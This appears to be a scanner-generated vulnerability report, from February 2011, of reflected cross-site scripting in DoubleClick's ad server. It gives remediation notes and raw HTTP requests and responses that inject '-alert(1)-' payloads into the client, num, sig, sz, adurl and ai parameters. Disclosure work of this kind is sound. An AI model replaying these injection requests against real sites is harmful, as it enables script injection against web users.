document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:26:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... BwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073b1f7b"-alert(1)-"f629491b606&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865895%3B40155600"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var ...[SNIP]...
The value of the client request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b71b2'-alert(1)-'c477c344b94 was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073b71b2'-alert(1)-'c477c344b94&adurl=;ord=1608247292? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Thu, 03 Feb 2011 16:05:41 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7540
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:41:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... BwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073b71b2'-alert(1)-'c477c344b94&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865895%3B39213494\"> ...[SNIP]...
The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1c9f"-alert(1)-"2dc82fe9c33 was submitted in the num parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1a1c9f"-alert(1)-"2dc82fe9c33&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=;ord=1608247292? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Thu, 03 Feb 2011 16:04:35 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7574
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:26:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... dHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1a1c9f"-alert(1)-"2dc82fe9c33&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865895%3B40155600"); var fscUrl = url; var f ...[SNIP]...
The value of the num request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b8cd'-alert(1)-'b5744e625cb was submitted in the num parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=11b8cd'-alert(1)-'b5744e625cb&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=;ord=1608247292? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Thu, 03 Feb 2011 16:04:39 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7540
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:41:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... dHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=11b8cd'-alert(1)-'b5744e625cb&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865895%3B39213494\"> ...[SNIP]...
The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7dc7"-alert(1)-"0a30ccb0824 was submitted in the sig parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQd7dc7"-alert(1)-"0a30ccb0824&client=ca-pub-4103679352234073&adurl=;ord=1608247292? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Thu, 03 Feb 2011 16:05:10 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7574
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:26:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQd7dc7"-alert(1)-"0a30ccb0824&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865895%3B40155600"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode ...[SNIP]...
The value of the sig request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3026'-alert(1)-'e11fbbb3a32 was submitted in the sig parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQe3026'-alert(1)-'e11fbbb3a32&client=ca-pub-4103679352234073&adurl=;ord=1608247292? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Thu, 03 Feb 2011 16:05:14 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7540
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:41:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQe3026'-alert(1)-'e11fbbb3a32&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865895%3B39213494\"> ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c82cb"-alert(1)-"4da37f8e4f3 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=lc82cb"-alert(1)-"4da37f8e4f3&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=;ord=1608247292? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Thu, 03 Feb 2011 16:03:56 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7574
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:26:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... l = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aa3/f/1ef/%2a/s%3B233905726%3B1-0%3B0%3B57865895%3B3454-728/90%3B40155600/40173387/2%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=lc82cb"-alert(1)-"4da37f8e4f3&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5u ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88a96'-alert(1)-'d3284128866 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l88a96'-alert(1)-'d3284128866&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=;ord=1608247292? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Thu, 03 Feb 2011 16:04:01 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7574
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:26:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... nk\" href=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3aa3/f/1ef/%2a/s%3B233905726%3B1-0%3B0%3B57865895%3B3454-728/90%3B40155600/40173387/2%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l88a96'-alert(1)-'d3284128866&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5u ...[SNIP]...
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d0bc'-alert(1)-'4aa45ed95d4 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=5d0bc'-alert(1)-'4aa45ed95d4 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 7855 Cache-Control: no-cache Pragma: no-cache Date: Thu, 03 Feb 2011 16:09:03 GMT Expires: Thu, 03 Feb 2011 16:09:03 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:24:09 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... UzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=5d0bc'-alert(1)-'4aa45ed95d4https://www.ally.com/bank/interest-checking-account/index.html?CP=57865897;40155604\"> ...[SNIP]...
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6b43"-alert(1)-"4b5b2d05a2f was submitted in the adurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=b6b43"-alert(1)-"4b5b2d05a2f HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 7855 Cache-Control: no-cache Pragma: no-cache Date: Thu, 03 Feb 2011 16:09:02 GMT Expires: Thu, 03 Feb 2011 16:09:02 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:24:09 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... UzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=b6b43"-alert(1)-"4b5b2d05a2fhttps://www.ally.com/bank/interest-checking-account/index.html?CP=57865897;40155604"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess ...[SNIP]...
The value of the ai request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6f88'-alert(1)-'5d816f81708 was submitted in the ai parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQBe6f88'-alert(1)-'5d816f81708&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=;ord=1145778283?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 7857 Cache-Control: no-cache Pragma: no-cache Date: Thu, 03 Feb 2011 16:08:55 GMT Expires: Thu, 03 Feb 2011 16:08:55 GMT Connection: close
